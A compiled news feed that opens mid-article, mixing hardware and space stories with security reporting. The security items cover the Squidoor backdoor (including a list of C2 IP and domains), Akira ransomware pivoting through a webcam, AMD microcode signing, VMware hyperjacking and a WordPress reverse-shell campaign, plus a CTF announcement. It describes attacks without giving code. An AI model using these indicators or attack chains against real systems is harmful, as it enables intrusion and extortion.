Inside there is a computer of sorts. Like a lot of gear from those days, there is a huge linear power supply. The video is a couple of hours long, so you’ll have plenty of chances to see the inside. There is an 8031 on the first logic board and some odd connections for external devices. As it turns out, that board wasn’t the main wordprocessing board which is under the keyboard.
On that board, there is another small CPU and some very large gate arrays. Under an odd-looking socket, however, lives an 80188, which is sort of an 8086/8088 variant.
The video is a very long deep dive into the internals, including reverse engineering of some of the ROM chips and even a surprise or two.
These machines always look retro-chic to us. Even then, though, we preferred WordStar.
youtube.com/embed/ZQoFgrJaHu0?…
Trio of Mods Makes Delta Printer More Responsive, Easier to Use
Just about any 3D printer can be satisfying to watch as it works, but delta-style printers are especially hypnotic. There’s just something about the way that three linear motions add up to all kinds of complex shapes; it’s mesmerizing. Deltas aren’t without their problems, though, which led [Bruno Schwander] to undertake a trio of interesting mods on his Anycubic Kossel.
First up was an effort to reduce the mass of the business end of the printer, which can help positional accuracy and repeatability. This started with replacing the stock hot-end with a smaller, lighter MQ Mozzie, but that led to cooling problems that [Bruno] addressed with a ridiculously overpowered brushless hairdryer fan. The fan expects a 0 to 5-VDC signal for the BLDC controller, which meant he had to build an adapter to allow Marlin’s 12-volt PWM signal to control the fan.
Once the beast of a fan was tamed, [Bruno] came up with a clever remote mount for it. A 3D-printed shroud allowed him to mount the fan and adapter to the frame of the printer, with a flexible duct connecting it to the hot-end. The duct is made from lightweight nylon fabric with elastic material sewn into it to keep it from taut as the printhead moves around, looking a bit like an elephant’s trunk.
Finally, to solve his pet peeve of setting up and using the stock Z-probe, [Bruno] turned the entire print bed into a strain-gauge sensor. This took some doing, which the blog post details nicely, but it required building a composite spacer ring for the glass print bed to mount twelve strain gauges that are read by the venerable HX711 amplifier and an Arduino, which sends a signal to Marlin when the head touches the bed. The video below shows it and the remote fan in action.
youtube.com/embed/b32DKuH9-Ho?…
Run Xbox 360 Games on Your PC With XenonDecomp
Inspired by the N64: Recompiled project, XenonRecomp does something similar, except for the PowerPC-equipped Microsoft Xbox 360 game console. Based around the triple-core IBM CPU codenamed ‘Xenon‘, the Xbox 360 was released in 2005 and generally quite successful over its lifespan despite its Red Ring of Death issues. Although the current Xbox Series X supports running a number of Xbox 360 games, this is done via emulation and only 632 games out of 2,155 are supported.
This is where XenonRecomp not only promises turning the games into native (x86) software, but also allowing for a range of graphical improvements. Best of all, it allows for Xbox 360 games to be preserved instead of linked to an obsolete console. That said, much like with N64Recomp, it’s not a simple matter of running a tool over the PPC binary. You’re expected to have in-depth systems knowledge, with the tools in XenonRecomp assisting with the decompilation (into C++) and the recompilation into x86 binaries, but support for PPC instructions, VMX (vector instructions) and aspects like jump table conversion and (currently missing) MMIO support are likely to present an enterprising developer with hours of fun to implement and debug when issues arise.
After recompilation into an x86 binary, the required assets are then expected to be copied in from a (legal) copy of the original game. As a proof of concept the game Sonic Unleashed has been ported in this manner, with [Modern Vintage Gamer] running through this port and the improvements made over the original game, as well as some issues you may encounter:
youtube.com/embed/hqpw-QPsdCg?…
Open Source Hardware, How Open Do You Want It To Be?
In our wider community we are all familiar with the idea of open source software. Many of us run it as our everyday tools, a lot of us release our work under an open source licence, and we have a pretty good idea of the merits of one such document over another. A piece of open source software has all of its code released under a permissive licence that explicitly allows it to be freely reproduced and modified, and though some people with longer beards take it a little too seriously at times and different flavours of open source work under slightly different rules, by and large we’re all happy with that.
When it comes to open hardware though, is it so clear cut? I’ve had more than one rant from my friends over the years about pieces of hardware which claim to be open-source but aren’t really, that I think this bears some discussion.
Open Source Hardware As It Should Be Done
To explore this, we’ll need to consider a couple of open source hardware projects, and I’ll start close to home with one of my own. My Single 8 home movie cartridge is a 3D printable film cartridge for a defunct format, and I’ve put everything necessary to create one yourself in a GitHub repository under the CERN OHL. If you download the file and load it into OpenSCAD you can quickly create an STL file for your slicer, or fiddle with the code and make an entirely new object. Open source at its most efficient, and everyone’s happy. I’ve even generated STLs ready to go for each of the supported ISO values.
For the second example project it’s necessary instead of a single OpenSCAD file, to consider a more complex design with multiple files. The Tildagon was the badge at the Electromagnetic Field 2024 hacker camp, and there are repositories for its hardware under the CERN OHL, and its software under an MIT licence. Using the contents of these repositories, you can make your own Tildagon in its entirety, or rework any part of it under the terms of the licence.
Of these, the film cartridge is a simple repository. Whether you download the OpenSCAD file or the STLs, there’s only one type of file and it’s unambiguous what the project comprises. But the Tildagon is much more complex device, that has many different files describing its various parts, all of which come together to make the whole. Everything required is present, and the terms of use for it all are clearly defined. For me, it’s a great example of how a complex open-source hardware project should be presented.
Open Source Hardware As It Shouldn’t Be Done
Now, imagine that instead of the EMF folks, I was the developer of the Tildagon. Imagine that I started taking files away from the repositories. The BOM first perhaps, then the KiCAD files. If I were left with just the Gerbers and the PNG schematic, I’ve in theory provided just enough resources to make a Tildagon, and with an appropriate open-source licence I could call it an open-source hardware project.
But even though I’ve granted people the right to use and modify the files in an open-source manner, can I really claim it’s as open-source as if I had released the full set of resources? Hand-editing the source of a Gerber doesn’t really count, and I agree with a point made by some of those friends I mentioned earlier. Providing as little as possible in that way is the equivalent of releasing a compiled binary, as when the convergence factor with free-as-in-beer approaches one, maybe it’s not open-source hardware after all.
Of course, the astute among you will have gathered by now that this isn’t about the Tildagon, instead I’m using it as a metaphor for something else. Though it’s tempting to do so I am not going to name and shame, but there have been a series of high-profile commercial open source hardware projects over the years that do to a greater or lesser extent just what I have described. I even have one of them on my bench, perhaps you do too. It’s not a problem if all you want is the product, but pushing the limits of open source in this way as an empty marketing ploy is not appropriate. Either something is fully open, or it should not, in my opinion at least, be allowed to describe itself as such. There’s nothing at all wrong with a closed source product, after all.
So. What’s To Be Done?
There’s a key phrase in the CERN OHL that I think is pertinent here; the idea of the “Complete source”. It’s mentioned in clause 1.8 of the text, which goes as follows:
1.8 'Complete Source' means the set of all Source necessary to Make
a Product, in the preferred form for making modifications,
including necessary installation and interfacing information
both for the Product, and for any included Available Components.
If the format is proprietary, it must also be made available in
a format (if the proprietary tool can create it) which is
viewable with a tool available to potential licensees and
licensed under a licence approved by the Free Software
Foundation or the Open Source Initiative. Complete Source need
not include the Source of any Available Component, provided that
You include in the Complete Source sufficient information to
enable a recipient to Make or source and use the Available
Component to Make the Product.
This clause encapsulates perfectly how the release of all project files should be necessary for a project that wants to be called open-source. It’s important, because open source goes beyond mere ability to copy, and extends into modifying and extending the project. Without those extra files, as with my Tildagon-as-Gerbers example above, this becomes next-to-impossible. Perhaps it’s time as a community to take a slightly harder line with anything less, and instead of welcoming every shiny new toy at face value, probing a little to find out just how deep that open source hardware logo goes.
Otherwise, calling something open source hardware will inevitably lose its meaning. Is this what we want, in exchange for a few flashy commercial projects?
Open source hardware logo on PCB: Altzone, CC BY-SA 3.0.
Hackaday Podcast Episode 311: AirTag Hack, GPS Rollover, and a Flat-Pack Toaster
This week, Elliot Williams and Tom Nardi start off the episode by announcing Arduino co-founder David Cuartielles will be taking the stage as the keynote speaker at Hackaday Europe. In his talk, we’ll hear about a vision of the future where consumer electronics can be tossed in the garden and turned into compost instead of sitting in a landfill for the next 1,000 years or so.
You’ll also hear about a particularly clever manipulation of Apple’s AirTag infrastructure, how a classic kid’s toy was turned into a unique display with the help of computer vision, and the workarounds required to keep older Global Positioning System (GPS) hardware up and running. They’ll also cover DIY toasters, extracting your data from a smart ring before the manufacturer can sell it, a LEGO interferometer, and a new feature added to the Bus Pirate 5’s already impressive list of capabilities.
Capping off the episode there’s a discussion about the surprising (or depending on how you think about it, unsurprising) amount of hardware that was on display at FOSDEM this year, and the history of one of man’s most infernal creations, the shopping cart wheel lock.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Download in DRM-free MP3 and listen from the comfort of your shopping cart.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 311 Show Notes:
News:
- Hackaday Europe 2025 Welcomes David Cuartielles, Announces Friday Night Bring-a-Hack
- Skype Is Shutting Down On May 5th
What’s that Sound?
- Know that sound? Fill out this form for a chance to win a Hackaday Podcast shirt!
Interesting Hacks of the Week:
- Hijacking AirTag Infrastructure To Track Arbitrary Devices
- Cheap Fiber Optic Wand Toy Becomes Tiny Weird Display
- Interposer Helps GPS Receiver Overcome Its Age
- Countdown To The GPS Timepocalypse
- GPS And ADS-B Problems Cause Cancelled Flights
- Year 2038 problem – Wikipedia
- Cheap Hackable Smart Ring Gets A Command Line Client
Quick Hacks:
- Elliot’s Picks:
- Speaking Computers From The 1970s
- Build A Parametric Speaker Of Your Own
- CNC Router And Fiber Laser Bring The Best Of Both Worlds To PCB Prototyping
- A CaptionCall Phone Succumbs To Doom, Again
- Building An Interferometer With LEGO
- Tom’s Picks:
- The Bus Pirate 5 Sure Can Glitch
- Is This The Oldest HD Video Online?
- Wake, Boot, Repeat: Remote OS Selection With GRUB And ESP
Can’t-Miss Articles:
hackaday.com/2025/03/07/hackad…
GNSS Signals Tracked on the Moon By LuGRE
As part of the payloads on the Firefly Blue Ghost Mission 1 (BGM1) that recently touched down on the Moon, the Lunar GNNS Receiver Experiment (LuGRE) has become the first practical demonstration of acquiring and tracking Earth orbital GNSS satellites. LuGRE consists of a weak-signal GNSS receiver, a high-gain L-band patch antenna the requisite amplification and filter circuits, designed to track a number of GPS and Galileo signals.
Designed by NASA and the Italian Space Agency (ISA), the LuGRE payload’s goal was to demonstrate GNSS-based positioning, navigation and timing at the Moon. This successful demonstration makes it plausible that future lunar missions, whether in orbit or on the surface, could use Earth’s GNSS satellites to navigate and position themselves with. On the way to the lunar surface, LuGRE confirmed being able track GNSS at various distances from the Earth.
Both LuGRE and BGM1 are part of NASA’s Commercial Lunar Payload Services (CLPS) program, with BGM1 delivering a total of ten payloads to the Moon, each designed to study a different aspect of the lunar environment, as well as hardware and technologies relevant to future missions.
Squidoor: un’analisi della backdoor cinese che minaccia le organizzazioni globali
Dal marzo 2023, un sospetto gruppo APT (Advanced Persistent Threat) di origine cinese ha iniziato a prendere di mira vari settori critici a livello globale, con particolare attenzione a governi, difesa, telecomunicazioni, aviazione ed educazione nel Sud-Est asiatico e in Sud America. Questo attore malevolo ha dimostrato capacità avanzate di attacco grazie all’impiego di Squidoor, una backdoor sofisticata e modulare progettata per operare in modo furtivo su sistemi Windows e Linux.
L’attacco, come evidenziato dalla mappatura delle connessioni di Threat Intelligence (vedi immagine allegata), mostra un’infrastruttura articolata, con l’uso di molteplici tecniche di persistenza e di esfiltrazione dei dati. Un’analisi dettagliata su questa minaccia è disponibile nel report pubblicato da Palo Alto Networks Unit 42, consultabile al seguente link: Unit 42 – Advanced Backdoor Squidoor. In questo articolo analizzeremo in dettaglio il funzionamento di Squidoor, le sue tecniche di evasione, i vettori di infezione e le contromisure necessarie per difendersi da questa minaccia.
Le caratteristiche tecniche di Squidoor
Squidoor non è una semplice backdoor, ma un sistema modulare avanzato che sfrutta diversi protocolli di comunicazione per mantenere l’accesso ai sistemi compromessi senza destare sospetti. Tra questi protocolli troviamo:
- Outlook API: Il malware utilizza l’API di Outlook per trasmettere comandi e dati al server di comando e controllo (C2). Questo approccio rende difficile il rilevamento, poiché il traffico appare come normale comunicazione email.
- Tunneling DNS: Squidoor può sfruttare richieste DNS per inviare dati ai server C2, eludendo firewall e sistemi di monitoraggio del traffico.
- Tunneling ICMP: L’uso di pacchetti ICMP (tipicamente impiegati per il ping) consente al malware di stabilire canali di comunicazione nascosti, complicando ulteriormente il rilevamento.
Oltre a queste capacità, Squidoor implementa sofisticate tecniche di offuscamento del codice (MITRE ATT&CK T1027), rendendo difficile la sua analisi e individuazione da parte dei sistemi di difesa tradizionali.
Le tecniche di infezione e persistenza
L’attacco inizia con la compromissione di server Microsoft Internet Information Services (IIS). Gli aggressori sfruttano vulnerabilità note per ottenere accesso iniziale e poi installano web shell offuscate, che garantiscono un accesso persistente ai sistemi infetti.
Queste web shell si caratterizzano per l’uso di chiavi di decrittazione simili e una struttura del codice che suggerisce una matrice comune. L’obiettivo è mantenere il controllo della macchina infetta, consentendo l’esecuzione di comandi remoti e l’esfiltrazione di dati sensibili.
Dalla mappatura delle connessioni di Threat Intelligence (vedi immagine), emergono diversi indirizzi IP e domini malevoli associati alla campagna, tra cui:
104.244.72.123update.hciiter.comsupport.vmphere.commicrosoft-beta.comzimbra-beta.info
Questi domini vengono utilizzati per le comunicazioni C2, permettendo agli attori della minaccia di eseguire operazioni di controllo e gestione dei dispositivi compromessi.
Le implicazioni per la sicurezza e le contromisure
L’uso di Squidoor rappresenta una minaccia significativa per le organizzazioni colpite, sia per la sua capacità di operare sotto traccia sia per la varietà di vettori di attacco impiegati. La capacità del malware di sfruttare protocolli legittimi come l’Outlook API e il DNS tunneling rende difficile il rilevamento mediante strumenti di sicurezza tradizionali.
Per proteggersi da questa minaccia, le organizzazioni devono adottare un approccio proattivo che includa:
- Aggiornamento e patching: Garantire che i sistemi, in particolare i server IIS, siano sempre aggiornati con le ultime patch di sicurezza per ridurre le superfici di attacco disponibili.
- Monitoraggio del traffico: Implementare soluzioni avanzate di monitoraggio in grado di individuare anomalie nel traffico di rete, soprattutto per quanto riguarda l’uso non convenzionale di DNS e ICMP.
- Analisi delle email: Monitorare le API di Outlook per identificare possibili abusi da parte di malware.
- Threat Intelligence e Response: Integrare strumenti di Threat Intelligence per individuare in anticipo gli indicatori di compromissione (IoC) associati a Squidoor e attivare contromisure adeguate.
L’attacco Squidoor dimostra l’evoluzione delle minacce APT e la necessità di difese avanzate per contrastarle. L’adozione di protocolli legittimi per scopi malevoli, unita alla capacità di operare su sistemi multipiattaforma, evidenzia l’importanza di strategie di sicurezza multilivello.
Le aziende e gli enti governativi devono essere consapevoli dei rischi e implementare misure di sicurezza avanzate per prevenire, rilevare e mitigare attacchi come questo. Solo attraverso un approccio basato su intelligence, monitoraggio continuo e aggiornamenti costanti è possibile contrastare minacce sofisticate come Squidoor e proteggere dati e infrastrutture critiche.
Resta aggiornato sulle ultime minacce di cybersecurity seguendo Red Hot Cyber.
L'articolo Squidoor: un’analisi della backdoor cinese che minaccia le organizzazioni globali proviene da il blog della sicurezza informatica.
Akira ransomware: la nuova minaccia che usa le webcam come porte d’ingresso
Akira rappresenta una delle più recenti minacce ransomware in grado di aggirare i tradizionali strumenti di difesa delle organizzazioni. Un recente caso analizzato dal team di S-RM ha evidenziato come questo gruppo abbia utilizzato una webcam non protetta per distribuire il proprio payload, eludendo le difese di un sistema EDR (Endpoint Detection and Response).
Il modus operandi iniziale
L’attacco ha avuto inizio con la compromissione della rete della vittima attraverso una soluzione di accesso remoto esposta a internet. Dopo l’accesso, Akira ha implementato AnyDesk.exe, uno strumento di gestione remota, per mantenere il controllo dell’ambiente e procedere con l’esfiltrazione dei dati.
Durante la fase avanzata dell’attacco, gli aggressori hanno utilizzato il protocollo RDP (Remote Desktop Protocol) per spostarsi lateralmente all’interno della rete. Hanno poi tentato di distribuire il ransomware su un server Windows inviando un file ZIP protetto da password contenente l’eseguibile dannoso. Tuttavia, l’EDR implementato dall’organizzazione ha rilevato e bloccato la minaccia prima che potesse essere eseguita.
Il pivot sulla webcam
Dopo aver realizzato che l’EDR ostacolava la diffusione del ransomware, gli attaccanti hanno modificato la loro strategia. Un’analisi della rete interna ha rivelato la presenza di dispositivi IoT vulnerabili, tra cui webcam e scanner biometrici. In particolare, una webcam risultava esposta con le seguenti criticità:
- Presenza di vulnerabilità critiche che consentivano l’accesso remoto e l’esecuzione di comandi.
- Sistema operativo basato su Linux, compatibile con la variante ransomware per Linux di Akira.
- Assenza di protezione da parte dell’EDR o di altri strumenti di sicurezza.
Gli attaccanti hanno quindi utilizzato la webcam compromessa come punto di ingresso per distribuire il ransomware sulla rete della vittima. Il traffico SMB (Server Message Block) generato dal dispositivo per trasmettere il payload è passato inosservato, permettendo ad Akira di cifrare con successo i file sui sistemi aziendali.
Lessons learned
L’incidente ha messo in evidenza tre aspetti cruciali della sicurezza informatica:
- Priorità nelle patch: Le strategie di gestione delle patch spesso si concentrano sui sistemi critici per il business, tralasciando dispositivi IoT che possono diventare punti di ingresso per gli attaccanti.
- Evoluzione degli attaccanti: Akira ha dimostrato una notevole capacità di adattamento, passando da implementazioni in Rust a versioni in C++ e supportando sia ambienti Windows che Linux.
- Limitazioni dell’EDR: L’EDR è uno strumento essenziale, ma la sua efficacia dipende dalla copertura, dalla configurazione e dal monitoraggio continuo. Dispositivi IoT spesso non sono compatibili con EDR, rendendoli vulnerabili agli attacchi.
Contromisure di sicurezza
Per mitigare minacce simili, le organizzazioni dovrebbero adottare le seguenti misure:
- Segmentazione della rete: Gli IoT dovrebbero essere isolati dai server e dai sistemi critici, limitando la loro connettività a porte e indirizzi IP specifici.
- Audit della rete interna: Controlli regolari sui dispositivi connessi possono identificare vulnerabilità e dispositivi non autorizzati.
- Gestione delle patch e delle credenziali: Aggiornare regolarmente il firmware dei dispositivi e sostituire le password di default con credenziali robuste.
- Spegnere i dispositivi non in uso: Se un dispositivo IoT non è necessario, dovrebbe essere disattivato per ridurre la superficie d’attacco.
Conclusioni
Il caso Akira evidenzia come gli attori delle minacce siano in grado di aggirare le misure di sicurezza tradizionali sfruttando punti deboli spesso trascurati, come i dispositivi IoT. Un’adeguata strategia di sicurezza che includa segmentazione di rete, monitoraggio continuo e aggiornamenti costanti è essenziale per ridurre il rischio di attacchi di questo tipo.
L'articolo Akira ransomware: la nuova minaccia che usa le webcam come porte d’ingresso proviene da il blog della sicurezza informatica.
This Week in Security: Zen Jailbreak, Telegram Exploit, and VMware Hyperjack
The fine researchers at Google have released the juicy details on EntrySign, the AMD Zen microcode issue we first covered about a month ago. And to give away the punchline: cryptography is hard. It’s hard in lots of ways, but the AMD problem here is all about keeping track of the guarantees provided by cryptographic primitives.
The vulnerability is in the verification of microcode updates for AMD’s Zen processor family. To understand microcode, you have to understand that X86-64 processors are actually built out of proprietary Reduced Instruction Set Computer (RISC) cores, that then emulate the more complex X86-64 complex instruction set computer (CISC) cores. Microcode is the firmware that controls that emulation step. For the security guarantees of modern computing, it’s rather important that CPUs only run signed microcode from the CPUs vendor. AMD has a pretty straightforward system to sign and then verify microcode patches.
Each patch includes a 2048-bit RSA public key and signature, verifying that the microcode was actually signed by the holder of the corresponding private key. The CPU hashes that public key, and compares it to a 128-bit value that was burned into the CPU at manufacture time. The intent is that if the hash matches, the public key must be the same. The problem was the hashing algorithm used for this step.
For this scheme to work, it would need a collision resistant cryptographic hashing function. The security of the scheme relies on the idea that it’s effectively impossible to find another public key that results in the same hash output. Finding a collision on that output value completely breaks the scheme.
AMD chose the AES Cipher Message Authentication Code (AES-CMAC) hash algorithm. AES-CMAC takes a message and key, and generates a Message Authentication Code (MAC). That MAC can then be used to verify that the message has not been tampered with. It can be thought of as a keyed hash with conditional collision resistance. But most importantly, if the secret key is known, none of those guarantees are valid. If the key is known, AES-CMAC fails to provide effective collision resistance in its output. And of course, the specific AES-CMAC key used in AMD Zen processors could be extracted, and turned out to be a NIST example key. To be clear, there is nothing wrong with AES-CMAC itself, it’s just the wrong algorithm for this use.
There’s one more clever trick that was needed to pull this together. The AES-CMAC collision only generates a public RSA key. How would an attacker take this arbitrary public key and produce the private key needed to sign these microcode updates? Isn’t one of the primary guarantees of RSA itself, that the private key can’t be derived from the public key? Only if the keypair is actually based on large prime numbers. After generating a few of these candidate public keys, one was discovered that was relatively easy to factor, as it was the product of more than just two primes. AMD’s fix replaces this hashing function with an appropriate cryptographic hash, preventing any microcode tampering.
Telegram and EvilLoader
The Telegram app has a weird problem deciding what to do with a .htm file sent as a video using the telegram API. Telegram tries to treat it as a video, and offers to open an external program to play the video. Because it’s actually HTML content, the “video” is opened in the browser, potentially running malicious JavaScript in that context.
This can be further used to trick an unsuspecting user into downloading a fake video player APK, to try to play this video, potentially leading to device compromise. This vulnerability is still unpatched as of time of writing, but has been widely known in the expected places. It may not be a 0-click RCE, but this one still has the potential for misuse.
More Info on The Heist
Last week we told you about the biggest heist in history, with Bybit getting hacked for cryptocurrency worth $1.5 billion. We know a bit more now, as the Bybit CEO has published the preliminary security report. The short story is that the North Korean Lazarus Group compromised a Safe{Wallet} developer workstation and gained access to an AWS or CloudFront API key. This was used to serve malicious JavaScript to Bybit, and that JavaScript disguised a malicious transaction, leading to the loss.
In retrospect there’s a glaring security problem with the Safe{Wallet} system that Bybit used: The reliance on JavaScript served from an outside server. It should take more than simple access to an AWS account to pull off a $1.5 billion heist.
Hyperjack
What happens when a process in a Virtual Machine (VM) can escape the virtual environment and take over the hypervisor? Nothing good. It’s known as hyperjacking, and VMware has a trio of vulnerabilities that makes it possible, across every version of ESXi, Workstation, Fusion, and Telco platforms — everything containing the ESX hypervisor.
And VMware says the vulnerabilities are being used in-the-wild. Patches are available, and this seems like a definite hair on fire scenario for anyone that may have untrusted tenants on VMware powered VMs.
Bits and Bytes
Have you ever wondered if a Stingray was operating in your area? That’s the cell tower simulator used to capture and analyze cell traffic, potentially breaking cell phone call encryption. EFF has released Rayhunter, and open source tool that captures cellular traffic and tries to detect Stingray-style traffic manipulation. The best part is that it runs on the Orbic RC400L mobile hotspot, a $20 piece of hardware.
How long does it take for your infrastructure to be probed after accidentally posting an AWS key online? As little as 10 hours, according to tests done by Clutch Security. Some forums are a bit friendlier, with Reddit users pointing out the leaked key and the post eventually getting deleted for the same reason.
And finally we have the four horsemen of WordPress Backdoors. About a thousand WordPress sites were infected with a JavaScript file, and this campaign spared no expense with adding backdoors to the sites. The infection added a malicious plugin, code into wp-config.php, new SSH keys, and what looks like a reverse shell. Somebody really wants to maintain access to those WordPress sites.
The Long Goodbye: More Instruments Shut Down on the Voyagers as End Nears
Saying farewell is hard, and in the case of the Voyager 1 & 2 spacecraft doubly so, seeing as how they have been with us for more than 47 years. From the highs of the 1970s and 1980s during their primary mission in our Solar System, to their journey into the unknown of Deep Space, every bit of information which their instruments record and send back is something unique that we could not obtain any other way. Yet with the shutting down of two more instruments, both spacecraft are now getting awfully close to the end of their extended missions.
Last February 25 the cosmic ray system (CRS) on Voyager 1 was disabled, with the Low Energy Charged Particle Instrument (LECP) on Voyager 2 to follow on March 24. With each spacecraft losing about 4 watts of available power per year from their RTGs, the next few instruments to be turned off are already known. Voyager 1’s LECP will be turned off next year, with that same year Voyager 2’s CRS also getting disabled.
This would leave both spacecraft with only their magnetometer (MAG) and plasma wave subsystem (PWS). These provide data on the local magnetic field and electron density, respectively, with at least one of these instruments on each spacecraft likely to remain active until the end of this decade, possibly into the next. With some luck both spacecraft will see their 50th birthday before humanity’s only presence in Deep Space falls silent.
Thanks to [Mark Stevens] for the tip.
Open Safety In The Auto Business: Renault Shares Its Battery Fire Suppression Tech
As consumers worldwide slowly make the switch from internal combustion vehicles to lower-carbon equivalents, a few concerns have appeared about electric vehicles. Range anxiety is ebbing away as batteries become bigger and chargers become more frequent, but a few well-publicized incidents have raised worries over fire safety.
Lithium-ion batteries can ignite in the wrong circumstances, and when they do so they are extremely difficult to extinguish. Renault has a solution, and in a rare moment for the car industry, they are sharing it freely for all manufacturers to use.
The innovation in question is their Fireman Access Port, a standardized means for a fire crew to connect up their hoses directly to the battery pack and attack the fire at its source. An opening is covered by an adhesive disk designed to protect the cells, but breaks under a jet of high-pressure water. Thermal runaway can then be halted much more easily.
The licensing terms not only allow use of the access port itself, but also require any enhancements be shared with the rest of the community of automakers using the system. This was the part which caught our interest, because even if it doesn’t come from the same place as the licences we’re used to, it sounds a lot like open source to us.
Oddly, this is not the first time Renault have open-sourced their technology, in the past they’ve shared an entire car.
Un Nuovo Attore Oscuro entra nell’Underground Criminale. Alla scoperta di Skira ransomware
elle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: Skira.
I gruppi ransomware operano generalmente secondo la logica del “doppio ricatto” (double extortion): dopo aver ottenuto un accesso non autorizzato ai sistemi informatici di un’organizzazione, cifrano i dati e al contempo ne sottraggono una copia. Se la vittima non paga il riscatto, i cybercriminali minacciano sia di lasciare i sistemi inaccessibili sia di pubblicare i dati esfiltrati.
Skira si inserisce in questo quadro come nuovo gruppo emergente che, come molti suoi “colleghi” (es. LockBit, BlackCat/ALPHV, ecc.), dispone di un proprio sito Tor dove rivendica gli attacchi e mette in mostra l’elenco delle vittime.
Nel contesto delle lingue scandinave, “skir” (o forme molto simili, come l’islandese “skír” o l’antico norvegese “skírr”) significa generalmente “puro”, “trasparente” o “chiaro”. In svedese moderno, ad esempio, l’aggettivo “skir” viene usato per indicare qualcosa di “sottile”, “delicato” o “trasparente”. Queste radici germaniche potrebbero dunque aver ispirato il nome “Skira”, sebbene non ci siano conferme certe che il gruppo ransomware abbia attinto a questa etimologia.
Struttura del DLS
La homepage del Data Leak Site (DLS) di Skira, accessibile esclusivamente tramite la rete Tor, si presenta in modo estremamente essenziale. L’interfaccia è composta da pochi elementi testuali: un messaggio di benvenuto, un collegamento a una sezione chiamata Hacking News (dedicata alle vittime) e le istruzioni per contattare il gruppo tramite Session. L’assenza di elementi grafici elaborati e l’impostazione scarna suggeriscono la volontà di puntare tutto sui contenuti, fornendo solo le informazioni strettamente necessarie a negoziare un eventuale pagamento o a mettere in mostra i dati rubati.
- Una homepage con un messaggio di benvenuto, un link denominato Hacking News (che conduce al “blog delle vittime”) e le istruzioni per contattarli tramite Session.
- Una pagina dedicata alle vittime (la sezione Hacking News) dove vengono elencate diverse organizzazioni prese di mira: aziende e persino un ente governativo di una città turca.
Metodi di Contatto
- Oltre al tradizionale “portale di pagamento” talvolta integrato (non sempre mostrato pubblicamente), Skira incoraggia l’uso di Session per negoziare il pagamento del riscatto.
Nella pagina “Hacking News” di Skira vengono elencati nomi di:
- Aziende del settore immobiliare (India).
- Produttori di beni di largo consumo (India).
- Società di consulenza in ambito normativo (USA).
- Un ufficio governativo di una municipalità in Turchia.
L’elenco indica che Skira potrebbe mirare a realtà eterogenee senza una particolare preferenza di settore, ma puntando a organizzazioni con un livello di sicurezza insufficiente o a target ritenuti in grado di pagare un riscatto per evitare l’esposizione di dati sensibili.
Conclusioni
Il gruppo Skira rappresenta una nuova minaccia ransomware, chiaramente orientata al modello di “doppia estorsione” con tanto di Data Leak Site su rete Tor. Sebbene al momento le informazioni tecniche sul loro payload ransomware siano ancora scarse, la presenza di un elenco di vittime reali, le potenziali richieste di riscatto e l’uso di un canale di comunicazione sicuro (Session) mostrano che il gruppo è determinato a operare in modo strutturato.
Come per altre campagne ransomware, la prevenzione e la tempestiva rilevazione sono fondamentali per limitare i danni. L’adozione di buone pratiche di sicurezza, un monitoraggio continuo dell’infrastruttura e procedure di incident response ben definite restano i pilastri per ridurre il rischio di attacchi simili.
L'articolo Un Nuovo Attore Oscuro entra nell’Underground Criminale. Alla scoperta di Skira ransomware proviene da il blog della sicurezza informatica.
La Terza Capture The Flag (CTF) di RHC è Pronta! Tra AI, Reti 4G e Stati Nazionali. Sei pronto?
Red Hot Cyber, come ogni anno all’interno della RHC Conference, ospiterà la nuova Capture The Flag realizzata in collaborazione con CyberSecurityUP e Hackmageddon e Fondazione Bruno Kessler. Si tratta dell’arena della Cyber Warfare Ibrida, dove solo i più astuti e determinati hacker etici riusciranno ad emergere.
Questa volta, la sfida sarà più realistica e coinvolgente che mai.
Sarai all’interno di una operazione militare orchestrata da uno stato ostile ai danni dello stato MINZHONG, una tranquilla repubblica orientale che basa la sua prosperità sul commercio di beni alimentari e agricoli. La tua operazione inizierà da una semplice parola: Supply Chain.
Il tuo obiettivo: come di consueto prendere il controllo di tutto, un pezzo alla volta!
La Supply Chain: lo scenario più temuto nella Cybersecurity di oggi
Sì, avete capito bene: questa volta il protagonista è il tanto discusso attacco alla supply chain realizzato in collaborazione con CyberSecurityUP. Una tecnica che negli scenari attuali rappresenta una delle minacce più insidiose per le grandi aziende. Gli attaccanti non colpiscono direttamente il bersaglio principale, ma sfruttano fornitori e partner connessi alla rete per ottenere un primo accesso. Da qui, con tecniche di pivoting e movimenti laterali, è possibile infiltrarsi progressivamente in infrastrutture critiche, eludendo controlli di sicurezza e aumentando il raggio d’azione dell’attacco.
Tutto inizia con un punto di accesso apparentemente marginale: una terza parte, un piccolo fornitore, magari un’azienda di supporto IT o un partner logistico, connesso alla rete del bersaglio. Basta un errore umano, una configurazione errata o una credenziale esposta per fornire agli attaccanti il foothold necessario. Da quel momento, l’obiettivo non è solo mantenere la persistenza, ma esplorare la rete interna, comprendere la struttura dell’infrastruttura e identificare asset sensibili da compromettere.
Il vero gioco inizia quando si passa all’azione: l’escalation dei privilegi, l’uso di tunnel cifrati per evitare il rilevamento, il movimento tra sistemi governativi e servizi critici. Gli attaccanti si muovono silenziosamente, sfruttando connessioni fidate per propagarsi senza destare sospetti. La supply chain diventa così il tallone d’Achille delle organizzazioni, dimostrando come una singola vulnerabilità esterna possa compromettere un’intera infrastruttura.
Gli obiettivi della Capture The Flag 2025
Come ogni anno, le infrastrutture della capture the flag sono realizzate interamente da Red Hot Cyber e i suoi partner tecnologici. Questo anno gli obiettivi strategici in questa nuova capture the flag, saranno i seguenti:
- Suppy Chain: Viola il fornitore di terze parti colpevole di una bassa postura cyber
- Siti governativi: Viola i portali ufficiali e i sistemi ministeriali.
- Infrastrutture critiche: Viola la rete telefonica 4G, La banca, la Rete Idrica, L’ospedale e altro ancora.
- Social Engineering: Crea email ed effettua Spear Phishing per convincere il CEO dell’azienda energetica a fornirvi dati di intelligence
Ogni flag conquistata sarà un passo in più verso la vittoria.
Ma non tutto potrà essere fatto online
